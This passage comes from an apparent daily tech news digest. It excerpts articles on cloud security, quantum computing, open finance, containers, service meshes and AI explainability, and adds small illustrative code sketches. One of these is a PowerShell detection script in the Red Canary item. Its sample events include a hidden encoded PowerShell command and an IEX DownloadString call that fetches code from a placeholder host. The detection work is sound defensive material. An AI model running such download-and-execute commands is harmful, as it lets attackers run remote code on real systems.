This focus on security, however, isn’t just a reaction to more cyberattacks. It also correlates with the enormous acceleration in digital transformation initiatives over the last year. Some industry experts dubbed it the shift from “cloud speed to COVID speed.” The pandemic forced a new way of working, and this ultimately means a new way of ensuring the security of how we work. It also means that companies store and manage more data in the cloud, which comes with its own regulatory compliance challenges. Every new process moved to the cloud, automated or made digital, has become a new vulnerability. Security teams need to manage these vulnerabilities to protect the data from a cyber-attack and ensure compliance with the latest data privacy regulations, such as the General Data Protection Regulation (GDPR) or the California Privacy Rights Act (CPRA). Other non-compliance issues will grow over the next year, especially as companies continue to remotely onboard and offboard customers and employees. These new processes will impact how to protect data and comply with the multiple different patchwork privacy regulations from various states and countries.


Speed and resilience: Five priorities for the next five months

Over the past year, organizations have become well versed in the basics of ensuring a safe working environment. More recently, however, companies have reported that some of their workers appear to be more willing to participate in higher-risk activities simply because they are tired of living with virus restrictions. This will require a different type of intervention and messaging, especially because newer COVID-19 variants pose a high risk and may be transmitted in ways that are not yet fully understood. Employers have a unique societal role to play in vaccination; they are important voices and can help reduce the friction associated with getting the vaccine. Self-reported data from a wide range of organizations point to individual and team productivity being higher than before the onset of the pandemic, but not uniformly so. According to a McKinsey survey, productivity is up for about half of all workers, with the other half reporting no change or lower productivity. The same survey suggested that, while the inability to disconnect is a real concern, increased productivity is correlated to a willingness to change how people work. 


Quantum computing may be able to solve the age-old problem of reasoning

The results show that the quantum machine could use inference models to draw conclusions. Probabilistic inference, which means the incorporation of uncertainty into computer programming, is particularly suited to quantum computers, Fiorentini said, because "quantum models have been proven to be more expressive, easier to train under certain circumstances." In practical terms, this means that quantum computing can be useful for solving both scientific and engineering problems. The results are "quite flexible, surprisingly robust, and can be applied in many fields," said Fiorentini. For instance, he added, Bayesian networks have traditionally been used in predictive maintenance of mission-critical equipment, such as jetliners and jet engines. "You model a system, and then you perform inference on the model by asking certain questions and by figuring out if the system is stable, reliable, and robust--or is about to break down--so you can intervene," Fiorentini said. "And which part is signaling the stress more strongly?" Medical diagnostics is another field that can benefit from these results. Although the techniques cannot be applied there exactly as in this study, "continuing in this direction, some of these techniques are applied to drug discovery," Fiorentini noted.
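For readers unfamiliar with the kind of query being described, here is a purely classical, toy version of probabilistic inference for predictive maintenance (nothing quantum about it, and the numbers are invented): given a sensor alarm, how likely is the part to actually be failing?

```python
# Toy Bayesian inference for predictive maintenance; all probabilities are made up.
p_fail = 0.01                 # prior: the part is failing on 1% of flights
p_alarm_given_fail = 0.95     # sensor fires when the part really is failing
p_alarm_given_ok = 0.05       # false-alarm rate

p_alarm = p_alarm_given_fail * p_fail + p_alarm_given_ok * (1 - p_fail)
p_fail_given_alarm = p_alarm_given_fail * p_fail / p_alarm   # Bayes' rule

print(round(p_fail_given_alarm, 3))   # ~0.161: the alarm raises the risk about 16x
```

A Bayesian network strings many such conditional relationships together, and the inference step asks questions of exactly this form across the whole model.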


FBI: APTs Actively Exploiting Fortinet VPN Security Holes

Once exploited, the attackers are moving laterally and carrying out reconnaissance on targets, according to officials. “The APT actors may be using any or all of these CVEs to gain access to networks across multiple critical-infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,” the warning explained. “APT actors may use other CVEs or common exploitation techniques—such as spear-phishing—to gain access to critical infrastructure networks to pre-position for follow-on attacks.” The joint cybersecurity advisory from the FBI and CISA follows last year’s flurry of advisories from U.S. agencies about APT groups using unpatched vulnerabilities to target federal agencies and commercial organizations. For instance, in October an alert went out that APTs were using flaws in outdated VPN technologies from Fortinet, Palo Alto Networks and Pulse Secure to carry out cyberattacks on targets in the United States and overseas. “It’s no surprise to see additional Fortinet FortiOS vulnerabilities like CVE-2019-5591 and CVE-2020-12812 added to the list of known, but unpatched flaws being leveraged by these threat actors,” said Narang.


How AI-powered BI tools will redefine enterprise decision-making

In this fourth wave, the traditional order of BI will be inverted. The traditional method of BI generally begins with a technical analyst investigating a specific question. For example, an electronics retailer may wonder if a higher diversity of refrigerator models in specific geographies will likely increase sales. The analyst blends relevant data sources (perhaps an inventory management system and a billing system) and investigates whether there is a correlation. Once the analyst has completed the work, they present a conclusion about past behavior. They then create a visualization for business decision makers in a system like Tableau or Looker, which can be revisited as the data changes. This investigation method works quite well, assuming the analyst asks the right questions, the number of variables is relatively well-understood and finite, and the future continues to look somewhat similar to the past. However, this paradigm presents several potential challenges in the future as companies continue to accumulate new types of data, business models and distribution channels evolve, and real-time consumer and competitive adjustments cause constant disruptions.
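The analyst's step described above can be pictured with a toy calculation (the numbers are invented): blend the two sources into aligned columns and check the correlation between refrigerator model diversity and sales.

```python
# Toy version of the analyst's correlation check; data is illustrative only.
import numpy as np

models_stocked = np.array([4, 6, 9, 12, 15])          # per region, from inventory system
units_sold     = np.array([120, 150, 210, 260, 300])  # per region, from billing system

r = np.corrcoef(models_stocked, units_sold)[0, 1]
print(round(r, 2))   # close to 1.0 for this made-up data
```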


How Going Back to Coding After 10 Years Almost Crushed Me

Containers, namely Docker, have really streamlined packaging and reduced env-related issues as you move code thru QA and into production. In the old days, you would develop in a system entirely different than where it was deployed (i.e. code on Windows and deploy to Unix), which invariably led to bugs and more work on each test and release cycle. Also, in the past, a release, QA, or DevOps engineer would take code from an SCM tag and figure out how to compile, test, and migrate it — and usually uncover a whole bunch of hardcoded paths and variables or missing libraries and files that needed to be reworked or hacked up to work. ... I remember fairly long release cycles (as long as three months at a startup). After attending specification meetings to understand the requirements line by line, a developer could go to their desk and play games for a few weeks without having to issue a dreaded update on where they were. Now, you have a daily standup and two-week sprint, so there is no more slacking! The role of the BA has also diminished with Agile, as developers now face users or product managers directly.


3 Reasons In-Memory Computing Is Essential for Microservices

The more advanced in-memory platforms support high-performance multiregion global architectures. This enables zero-downtime business operations via a high-performance shared memory layer that supports them. This also simplifies scaling up these services to more fully leverage the promise of cloud native and serverless. They also provide features such as automated disaster recovery, zero-downtime code deployments (blue-green deployments), and rolling product upgrades, as well as tools to integrate these seamlessly into modern cloud DevOps automation tools and new AIOps tools that help monitor these architectures and deliver auto-scaling and autonomous troubleshooting. For a concrete example of how these could be employed, imagine having many microservices in an online shopping application. These include separate capabilities that power browsing for products, adding and removing items from a shopping cart, and so on. Moreover, each of these microservices can be somewhat independent of the others. But some actions, like checking out, fulfillment and shipping, may require multistep orchestration and some roll-back behavior.
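A minimal sketch of that multistep orchestration with roll-back, independent of any particular in-memory platform; the step functions are stand-ins for calls to the individual microservices.

```python
# Hedged sketch: run checkout steps in order; if one fails, undo the completed ones.
def reserve_inventory(order):  print("inventory reserved")
def charge_payment(order):     raise RuntimeError("card declined")
def ship(order):               print("shipped")

def release_inventory(order):  print("inventory released")
def refund_payment(order):     print("payment refunded")

STEPS = [
    (reserve_inventory, release_inventory),
    (charge_payment, refund_payment),
    (ship, None),
]

def checkout(order):
    done = []
    try:
        for step, undo in STEPS:
            step(order)
            done.append(undo)
    except Exception as exc:
        print(f"rolling back after: {exc}")
        for undo in reversed(done):   # compensate completed steps in reverse order
            if undo:
                undo(order)

checkout({"id": 42})
```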


Keeping your data safe from hackers while working from home

One of the big changes the move towards remote working has brought about is removing employees from the protection of the corporate firewall. Working from inside the office provides people with anti-virus and other protections that can help to filter out some attacks. Now, instead of this, many people are working from their own computer from their homes, where they may not have anti-virus at all – and their home router won't provide a robust defence against attackers like a corporate firewall would. Criminals know this and are looking to take advantage with cyberattacks, especially when people – rushed off their feet while balancing working from home with the rest of their life – might unintentionally click on a phishing link or respond to a request that appears to come from a colleague but is actually a cyber criminal. "Humans are ultimately fallible. Unfortunately it's the organic matter behind the keyboard, which is often the vulnerable part of the loop," says Troy Hunt, creator of HaveIBeenPwned and digital advisor to Nord Security.


Booking.Com's GDPR Fine Should Serve as 'Wake-Up Call'

While the incident itself was troubling, the Dutch Data Protection Authority called out Booking.com for its response to the breach. The company, according to the report, first found out about the security lapse on Jan. 13, 2019, but waited until Feb. 7 of that year to alert authorities. Under GDPR rules, organizations must report a breach within 72 hours of its occurrence. By the time Booking.com notified the Dutch Data Protection Authority, more than 20 days had elapsed. Monique Verdier, the vice president of the Dutch privacy watchdog, noted in the report that the delay in reporting the incident could have put additional customers at risk and showed a disregard for their data. "That speed is very important for the victims of a leak," Verdier said. "After such a report, the AP can, among other things, order a company to immediately warn affected customers. In this way, for example, to prevent criminals from having weeks to continue trying to defraud customers." A spokesman for the company could not be immediately reached for comment on Friday, but the report notes that Booking.com would not appeal the fine.



Quote for the day:

"Enjoy the little things, for one day you may look back and realize they were the big things." -- Robert Brault

Daily Tech Digest - April 02, 2021

Open banking is big. Here’s why open finance is bigger

Open finance will improve the experience for customers in the U.S., but they won’t really notice it directly, Costello says. However, under the hood, they’ll benefit from more reliability and more symmetric customer protection end to end — and that will make a big difference. This move to a regulated open finance experience will give customers not just uniform access to all of the data, but under the same umbrella of symmetric customer protection, their payment account data will be as safe as their loan data, payroll data, and so on. “The customer experience for the person who needs to use these services but is reluctant to is going to be incredibly positively impacted,” he says. “Now they’re going to have enough trust in these tools and services to know that if they’re harmed in some way, if there’s a breach in the system or a bad actor, they’re going to be protected.” “As this ecosystem takes off, the data that is being generated, correlated, and used is beneficial not just for the consumer and their direct third-party service providers, but by all third-party service providers,” Costello says.


5 key cybersecurity risks in 2021, and how to address them now

Cybersecurity technologies have become more advanced and more available than ever, and this has led to a consistent pattern of over-reliance on point products to defend against threats. While technology is essential to this mission, it isn’t a standalone solution. Oftentimes, mid-market businesses lack dedicated cybersecurity resources that are just as valuable. This skill shortage has been heightened by the pandemic, as the network diagram has expanded to include surfaces like at-home PCs and other WFH access points. According to the Verizon DBIR, almost one in three data breaches in 2020 involved small businesses, and mitigation will take a planned combination of people, processes, and technology. Hiring more security professionals, especially with the growth in demand, can be an expensive undertaking. Rather than investing in an internal 24/7 security operations center (SOC), outsourcing this work has become an appealing option that is a cost-effective and essential addition to your defense strategy. This team can work in a way that unifies disparate technologies with process to create a singular, strong point of visibility.


Is the Future of Manufacturing Automated or Autonomous?

Manufacturing autonomy is not just a good idea, it’s a timely idea, offering a chance to democratize both manufacturing and innovation. By creating autonomous and automated manufacturing solutions, it is possible to substantially reduce the labor cost element in manufacturing, allowing higher labor cost regions to bring manufacturing home. This is extremely timely given the desire of most nations to use manufacturing as part of their post-pandemic recovery strategy. And the pandemic isn’t the only driver or acceleration. The Covid-19 pandemic came on the back of a bitter trade war between the US and China, creating a perfect storm of disruption that has led to a real desire to restore supply chains to make nations more resilient to future risk. Both Theo and Yoav agree that autonomous and automated manufacturing solutions offer the only route to competitiveness for the US and for Western Europe, where the benefits of massive consumer markets are offset by high labor rates. Consumers want to buy products made locally, but they don’t want to pay more for, or get less from, those products. 


CISA Orders Agencies to Recheck for Exchange Compromises

CISA is requiring federal agencies that use on-premises Exchange servers to conduct two exercises by noon Monday. The agencies must run Microsoft's Safety Scanner tool, also known as MSERT, in full scan mode and report those results to CISA. This tool, which was released last month, can detect web shells used during attacks that target the ProxyLogon flaw in Exchange. CISA is also ordering federal agencies to run this same scan every week for four weeks to check for additional compromises. In addition to mandating MSERT scans, CISA is requiring that agencies run a script called Test-ProxyLogon.ps1 to check both Exchange and Internet Information Services, or IIS, logs for any malicious activity related to these attacks. "If attacker activity is identified, the script reports the vulnerabilities for which it found evidence of use and collects logs that it stores in the specified output path in the Test-ProxyLogonLogs directory," CISA notes. After those tasks are complete and the results are returned, CISA is requiring that federal agencies take additional steps to harden networks and infrastructure by June 28.


Quantum computer has the edge for NP verification

The algorithm the researchers use to demonstrate this is known as an interactive proof protocol. Here, one component of the experimental set-up acts as a “prover”, using coherent light pulses to send partial solutions to the NP-complete problem in the form of a quantum state. The second component fills the role of the “verifier”, deciding with high accuracy whether the solution is correct based on the limited information given. When certain bounds are placed on the expected accuracy of the verifier, as well as the protocol’s speed and efficiency in terms of the amount of information that can be communicated throughout the interactions, it is possible to demonstrate that the quantum algorithm far outperforms any classical attempts at doing the same. By showing that a quantum algorithm can verify solutions to NP-complete problems efficiently, the result could allow for new applications in secure remote quantum computing. A client with a rudimentary quantum machine could, for example, verify information they receive from a powerful quantum server without ever having access to the full solution. 
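As a classical refresher on what "verifying" means here (this is not the photonic protocol itself): for an NP problem such as subset-sum, checking a proposed certificate is fast even though finding one is hard, which is exactly why efficient verification with limited information is interesting.

```python
# Classical NP verification: checking a certificate for subset-sum is quick.
def verify_subset_sum(numbers, target, certificate):
    """certificate: the indices claimed to sum to target."""
    return sum(numbers[i] for i in certificate) == target

numbers = [3, 34, 4, 12, 5, 2]
print(verify_subset_sum(numbers, 9, [2, 4]))   # 4 + 5 == 9 -> True
print(verify_subset_sum(numbers, 9, [0, 1]))   # 3 + 34 != 9 -> False
```

In the interactive-proof setting described above, the verifier must make this kind of accept/reject decision while receiving only partial information about the solution.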


Blockchain Comes Under Data Privacy Scrutiny

The decentralized nature of blockchain eliminates the need for an intermediary serving as a central clearing authority and decreases risks associated with traditional centralized systems and their functionality. By removing the intermediary between a given server and the data being collected, distributed, and analyzed, blockchain enables an increase in the speed and efficiency of data processing. Additionally, blockchain reduces the risk of human error, which typically leads to a reduction in costs and expenses. Traceability is one of the major benefits of blockchain that businesses in various industries are exploiting. Tracing transactions on blockchain is simplified because all data is stored on one immutable digital distributed ledger, which makes it easy to review the history of transactions. The traceability element of blockchain has been especially useful for businesses distributing products on a complicated supply chain because blockchain facilitates tracking within a supply chain. Blockchain will increasingly change how businesses operate in various industries and sectors, but this disruptive technology will undoubtedly continue to face legal and regulatory challenges as it becomes more widely accepted.

Cisco streamlines, upgrades its SASE bundle

The offering includes Cisco's Viptela and Meraki SD-WAN software packages, Duo and AnyConnect remote access, Umbrella security as well as Duo zero trust and other security components. The integrated package will be a plus for enterprises, experts say. “Eighty percent of organizations want to reduce the number of security vendors and products to create a more integrated protection/incident-response and easier to manage security operations," said Peter Firstbrook, a Gartner research vice president. “Reducing the barriers to adoption and increasing the level of integration is going to be a major task for multi-product vendors,” Firstbrook said. “At the same time SASE is a hot topic as more network traffic moves off the LAN and into the cloud. The more of this problem that Cisco can address the more successful they will be.” Within the bundle Cisco added features including the ability to support remote browser isolation, data loss prevention (DLP), cloud malware detection, and support for Cisco Meraki MX environments with Umbrella security. “DLP and remote browser isolation are desirable but they are catch-up items," Firstbrook said.


A strategic vision for model risk management

Banks face cost and capacity pressures as they strengthen frameworks and expand model inventories. Validation backlogs and delays mount as existing validation capacity fails to cover expanding demand. Inventory is increasing as new models are developed outside traditional areas of financial risk. The rapid development of AI is increasing model complexity and adding to the backlog. The quality of validation can consequently suffer unless the bank brings in external support. To manage the model-validation budget, leading banks have industrialized validation, using lean fundamentals and automated processes. Models are prioritized for validation based on key factors such as their importance in business decisions and materiality of the model exposure. Validation intensity is customized by model tiers to improve speed and efficiency. Likewise, model tiers are used to define the resource strategy and governance approach. The use of model tiers to improve efficiency varies by region. In Asia and Latin America, where MRM functions are still maturing, about half our surveyed banks report using tiers in their model inventory. 
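As a rough illustration of tier-based prioritization, the hypothetical Python sketch below scores each model on business importance and exposure materiality, assigns a tier, and maps tiers to a validation intensity. The scales, thresholds, and intensity labels are invented for illustration; a real MRM framework would define them in policy.

from dataclasses import dataclass

@dataclass
class Model:
    name: str
    business_importance: int   # illustrative scale: 1 (low) .. 5 (critical)
    exposure_materiality: int  # illustrative scale: 1 (low) .. 5 (very large)

def assign_tier(model: Model) -> int:
    """Map a simple combined score to a tier (1 = highest scrutiny)."""
    score = model.business_importance + model.exposure_materiality
    if score >= 8:
        return 1
    if score >= 5:
        return 2
    return 3

# Hypothetical mapping of tier to validation intensity.
VALIDATION_INTENSITY = {
    1: "full independent validation, annual review",
    2: "targeted validation of key assumptions, biennial review",
    3: "lightweight checks, revalidate on material change",
}

inventory = [
    Model("credit-risk PD", 5, 5),
    Model("marketing propensity", 2, 2),
    Model("AML transaction scoring", 4, 3),
]

for m in sorted(inventory, key=assign_tier):
    tier = assign_tier(m)
    print(f"{m.name}: tier {tier} -> {VALIDATION_INTENSITY[tier]}")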


Bitcoin was always bound to fail its most important mission

Although Bitcoin has been around for more than a decade, the cryptocurrency industry is still in its nascent stages and the process of maturation requires all manner of approaches to be explored. The underlying technology has already come a long way and so have its alternative use cases (look at the rise of DeFi), but crypto is still largely battling the same demons: volatility, limited adoption and regulatory uncertainty. However, Schwartz is convinced the magnetism of cryptocurrency and the commitment of the community to innovation will mean technological solutions are found to some of these most pressing questions. “It’s going to be an interesting growing up process for cryptocurrency, because regulators have legitimate interest in preventing things like money laundering and terrorist financing. But most [members of the crypto space] want to comply with these kinds of measures.” “Generally speaking, it's not a very good business model to be in defiance of regulation. And it has been a drag on the adoption of crypto that people have had difficulty figuring out how to remain compliant.”


Importance of data governance and management in times of a global pandemic

The problem of data governance has now become prominent. Data governance is different from data management. The latter has to do with the engineering aspects of data – how it is created, stored, accessed, processed, and secured, and whether it is complete. Data governance, on the other hand, is concerned with issues of policy, which are larger and have an impact on the economy and society. Data governance has to do with where data originates, who collects it and how, where it is stored, who uses it and for what purpose, how the information obtained from data is used, and how data is erased. Data governance presents many challenges, contradictions, and consequent trade-offs. For example, one challenge is that of maintaining the privacy of data on individuals versus using data for surveillance. During the pandemic this contradiction became prominent. Several countries, including India, introduced infection-tracking software that would inform individuals who were using these apps whether they were close to others who were infected.



Quote for the day:

"Great Groups need to know that the person at the top will fight like a tiger for them." -- Warren G. Bennis

Daily Tech Digest - April 01, 2021

How standard silicon chips could be used for quantum computing

To create and read qubits, which are the building blocks of those devices, scientists first have to retain control over the smallest quantum particles that make up a material; but there are different ways to do that, with varying degrees of complexity. IBM and Google, for example, have both opted for creating superconducting qubits, which calls for an entirely new manufacturing process, while Honeywell has developed a technology that individually traps atoms to let researchers measure the particles' states. These approaches require creating new quantum processors in a lab, and are limited in scale. Intel, for example, has created a 49-qubit superconducting quantum processor that is about three inches square, which the company described as already "relatively large", and likely to cause complications when it comes to producing the million-qubit chips that will be required for real-world implementations at commercial scale. With this in mind, Quantum Motion set off to find out whether a better solution could be found in proven, existing technologies. "We need millions of qubits, and there are very few technologies that will make millions of anything – but the silicon transistor is the exception," John Morton, ... tells ZDNet.


Top 5 Attack Techniques May Be Easier to Detect Than You Think

The analysis shows attackers for the most part are continuing to rely on the same techniques and tactics they have been using for years. And, despite all the concern about sophisticated advanced persistent threat (APT) actors and related threats, the most common threats that organizations encountered last year are what some would classify as commodity malware. "Although the threat landscape can be overwhelming, there are many opportunities we have as defenders to catch threats in [our] networks," says Katie Nickels, director of intelligence at Red Canary. "The challenge for defenders is to balance the 'tried and true' detection opportunities that adversaries reuse with keeping an eye on new techniques and threats." Red Canary's analysis shows attackers most commonly abused command and script interpreters like PowerShell and Windows Command Shell to execute commands, scripts, and binaries. ... Attackers most commonly took advantage of PowerShell's interactive command-line interface and scripting features to execute malicious commands, obfuscate malware and malicious activity, download additional payloads, and spawn additional processes.
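To make those "detection opportunities" concrete, here is a rough Python sketch that scans process command lines for a handful of indicators often associated with malicious PowerShell use, such as encoded commands and download cradles. The indicator list and sample events are illustrative assumptions, not detections taken from the Red Canary report, and real-world rules need tuning against an organization's own baseline.

import re

# Illustrative indicators only; real detection content needs tuning to
# the organisation's own baseline to avoid false positives.
SUSPICIOUS_PATTERNS = [
    r"-enc(odedcommand)?\s",   # Base64-encoded command blocks
    r"downloadstring\(",       # classic download cradle
    r"iex[\s(]",               # Invoke-Expression shorthand
    r"-nop\b",                 # -NoProfile, common in one-liners
    r"frombase64string",       # inline payload decoding
]

def flag_command_line(cmdline: str):
    """Return the indicators matched by a single process command line."""
    lowered = cmdline.lower()
    return [p for p in SUSPICIOUS_PATTERNS if re.search(p, lowered)]

sample_events = [
    "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0A",
    "powershell.exe Get-ChildItem C:\\Reports",
    "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://x/a')",
]

for event in sample_events:
    hits = flag_command_line(event)
    if hits:
        print("ALERT:", event[:60], "->", hits)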


Preparing for enterprise-class containerisation

Beyond the challenges of taking a cloud-native approach to legacy IT modernisation, containers also offer IT departments a way to rethink their software development pipeline. More and more companies are adopting containers, as well as Kubernetes, to manage their implementations, says Sergey Pronin, product owner at open source database company Percona. “Containers work well in the software development pipeline and make delivery easier,” he says. “After a while, containerised applications move into production, Kubernetes takes care of the management side and everyone is happy.” Thanks to Kubernetes, applications can be programmatically scaled up and down to handle peaks in usage by dynamically adjusting processor, memory, network and storage requirements, he adds. However, while the software engineering teams have done their bit by setting up auto-scalers in Kubernetes to make applications more available and resilient, Pronin warns that IT departments may find their cloud bills starting to snowball. For example, an AWS Elastic Block Store (EBS) user will pay for 10TB of provisioned EBS volumes even if only 1TB is really used. This can lead to sky-high cloud costs.
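The cost gap in Pronin's example is simple arithmetic. The sketch below works through the 10TB-provisioned versus 1TB-used scenario; the per-GB price is an assumption (roughly the published rate for general-purpose gp2 volumes in a US region) and varies by volume type and region.

# Assumed list price for gp2 EBS storage (~USD per GB-month); check the
# current AWS pricing page for the actual figure in your region.
PRICE_PER_GB_MONTH = 0.10

provisioned_gb = 10 * 1024   # 10 TB of provisioned EBS volumes
used_gb = 1 * 1024           # only 1 TB actually holding data

monthly_bill = provisioned_gb * PRICE_PER_GB_MONTH   # billed on provisioned size
useful_spend = used_gb * PRICE_PER_GB_MONTH
wasted_spend = monthly_bill - useful_spend

print(f"Monthly EBS bill:    ${monthly_bill:,.2f}")
print(f"Spend on used data:  ${useful_spend:,.2f}")
print(f"Paid for idle space: ${wasted_spend:,.2f} "
      f"({wasted_spend / monthly_bill:.0%} of the bill)")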


Practical Applications of Complexity Theory in Software and Digital Products Development

The first radical idea has to do with the theory and practice of Complexity. The second radical idea has to do with the human element in Complexity theory. Let’s start with the first one. Most of the literature on Complexity and most of the conversations revolving around Complexity are theoretical. This has been true for the last 17 years, in the software development community, in the product development community, and more generally in the broader Lean and Agile community. When you look into real teams and organisations, here and there you will find some individual who is passionate about Complexity, who knows the theory, and who is using it to interpret, understand, and make sense of the events happening around her/him and to react in more effective ways. Complexity gives her/him an edge. But such Complexity thinking remains confined to isolated individuals. The first radical idea is to turn the centre of gravity of the conversation around Complexity upside down: to make the practical applications of Complexity theory prominent.


Researchers show that quantum computers can reason

Admittedly, it’s not like you can run down to Best Buy today and purchase a quantum computer. They are not yet ubiquitous. IBM apparently is collecting quantum computers the way Jerry Seinfeld collects classic and rare cars. Big Blue also is installing a quantum computer at Cleveland Clinic, the first private-sector recipient of an IBM Quantum System One. But quantum computing’s time in the sun inches inexorably closer. “Quantum computing (QC) proof of concept (POC) projects abound in 2021 with commercialization already happening in pilots and building to broader adoption before 2025,” REDDS Capital Chairman and General Partner Stephen Ibaraki writes in Forbes. “In my daily engagements’ pro bono with global communities – CEOs, computing science/engineering organizations, United Nations, investments, innovation hubs – I am finding nearly 50% of businesses see applications for QC in five years, though most don’t fully understand how this will come about.” IBM has not been the only major tech company developing quantum computing technology. 


Service Meshes: Why Istio? An Introduction

In any microservice-based architecture, whenever one microservice calls another, we cannot easily infer or debug what is happening inside the networked service call. This can lead to serious problems when an unwanted situation arises and we cannot properly diagnose it: performance issues, security gaps, load-balancing problems, or a lack of tracing and observability of service calls. The severity of the issue multiplies when an application depends on many microservices to work properly. ... Istio has the most features and flexibility of any of these three service meshes by far: Cascading failure prevention (circuit breaking; a toy sketch of this idea follows the feature list below); Authentication and authorization. The service mesh can authorize and authenticate requests made from both outside and within the app, sending only validated requests to instances; Resiliency features (retries, timeouts, deadlines, etc.); Robust load balancing algorithms.
Control over request routing (useful for things like CI/CD release patterns); The ability to introduce and manage TLS termination between communication endpoints; Rich sets of metrics to provide instrumentation at the service-to-service layer ...
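Istio enforces behaviours like circuit breaking declaratively at the sidecar proxy, but the underlying idea is easy to sketch in application code. The toy Python circuit breaker below stops calling a failing downstream service for a cool-down period so that failures do not cascade; it illustrates the concept only and is not how Istio is configured or implemented.

import time

class CircuitBreaker:
    """Toy circuit breaker: stop calling a failing service for a while."""

    def __init__(self, max_failures=3, reset_after_seconds=30.0):
        self.max_failures = max_failures
        self.reset_after = reset_after_seconds
        self.failures = 0
        self.opened_at = None

    def call(self, remote_call, *args, **kwargs):
        if self.opened_at is not None:
            if time.monotonic() - self.opened_at < self.reset_after:
                raise RuntimeError("circuit open: failing fast")
            # Cool-down elapsed: allow a trial request (half-open state).
            self.opened_at = None
            self.failures = 0
        try:
            result = remote_call(*args, **kwargs)
        except Exception:
            self.failures += 1
            if self.failures >= self.max_failures:
                self.opened_at = time.monotonic()  # trip the breaker
            raise
        self.failures = 0
        return result

def flaky_service():
    raise ConnectionError("downstream service unavailable")

breaker = CircuitBreaker(max_failures=2, reset_after_seconds=5.0)
for attempt in range(4):
    try:
        breaker.call(flaky_service)
    except Exception as exc:
        print(f"attempt {attempt}: {exc}")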


Is Explainability In AI Always Necessary?

With increasing sophistication and completeness, the system becomes less understandable. “As a model grows more realistic, it becomes more difficult to understand,” said David Hauser at the recently concluded machine learning developers conference. According to Hauser, clients want the model to be understandable and realistic. This is another paradox a data scientist has to live with. He also stressed that understandable solutions give up on accuracy. For instance, network pruning is one such technique that takes a hit on accuracy. The moment non-linearities or interactions are introduced, the answers become less intuitive. ... One of the vital purposes of explanations is to improve ML engineers’ understanding of their models to refine and improve performance. Since machine learning models are “dual-use”, explanations or other tools could enable malicious users to increase the capabilities and performance of undesirable systems. There is no denying that explanations allow model refinement. And, as we go forward, apart from the debugging and auditing of the models, organisations are looking at data privacy through the lens of explainability.
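To make the pruning example concrete, the short sketch below uses PyTorch's built-in pruning utility to zero out 30% of a layer's weights by magnitude, producing a sparser and somewhat simpler model. The layer size and pruning fraction are arbitrary, and the accuracy cost Hauser alludes to would be measured on a validation set and is often only partly recovered by fine-tuning.

import torch
import torch.nn as nn
import torch.nn.utils.prune as prune

# An arbitrary small layer standing in for part of a trained network.
layer = nn.Linear(in_features=64, out_features=16)

# Zero out the 30% of weights with the smallest absolute values.
prune.l1_unstructured(layer, name="weight", amount=0.3)

sparsity = (layer.weight == 0).float().mean().item()
print(f"Fraction of weights pruned: {sparsity:.2%}")

# Make the pruning permanent (fold the mask into the weight tensor).
prune.remove(layer, "weight")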


Leaker Dismisses MobiKwik's Not-So-Nimble Breach Denial

MobiKwik hasn't done itself any favors in its handling of this episode, noting that when the allegedly stolen data came to light in February, it "undertook a thorough investigation with the help of external security experts and did not find any evidence of a breach." Subsequently, after they reviewed the leaker's sample of stolen data, "some users have reported that their data is visible on the dark web," it adds, but then it says other breaches must be to blame. "While we are investigating this, it is entirely possible that any user could have uploaded her/his information on multiple platforms. Hence, it is incorrect to suggest that the data available on the dark web has been accessed from MobiKwik or any identified source," MobiKwik claims. But the company says that despite having already brought in "external security experts" to investigate, it's now bringing in more, "to conduct a forensic data security audit." Hence, it's unclear what the first group of investigators might have done. ... Reuters on Thursday, citing an anonymous source with knowledge of the discussions, reported that the Reserve Bank of India was "not happy" with MobiKwik's statements, and ordered it to immediately launch a full digital forensic investigation.


New Storage Trends Promise to Help Enterprises Handle a Data Avalanche

Data virtualization has been around for some time, but with increasing data usage, complexity, and redundancy, the approach is gaining traction. On the downside, data virtualization can be a performance drag if the abstractions, or data mappings, are too complex, requiring extra processing, Linthicum noted. There's also a longer learning curve for developers, often requiring more training. ... While not exactly a cutting-edge technology, hyper-converged storage is also being adopted by a growing number of organizations. The technology typically arrives as a component within a hyper-converged infrastructure in which storage is combined with computing and networking in a single system, explained Yan Huang, an assistant professor of business technologies at Carnegie Mellon University's Tepper School of Business. Huang noted that hyper-converged storage streamlines and simplifies data storage, as well as the processing of the stored data. "It also allows independently scaling computing and storage capacity in a disaggregated way," she said.


The importance of tech, training and education in data classification

We have seen how automation plays a key role in establishing a firm foundation for an organisation’s security culture, but given employees play such a vital role in ensuring that the business maintains a strong data privacy posture, the ability to work with stakeholders and users to understand data protection requirements and policies is key. Security and data protection education must be conducted company-wide and must exist at a level that is workable and sustainable. Regular security awareness training and a company-wide inclusive security culture within the business will ensure that data security becomes a part of everyday working practice, embedded into all actions and the very heart of the business. A robust data protection protocol is critical for all organisations, and this will particularly be the case as we move beyond Covid-19 into the new normal. Delivering optimal operational efficiencies, data management and data classification provision under post-pandemic budget constraints will be an ongoing business-critical challenge. To do nothing, however, will set up an organisation to fail, and we have already seen large fines incurred by organisations that have not given data security enough priority.



Quote for the day:

"Leadership cannot just go along to get along. Leadership must meet the moral challenge of the day." -- Jesse Jackson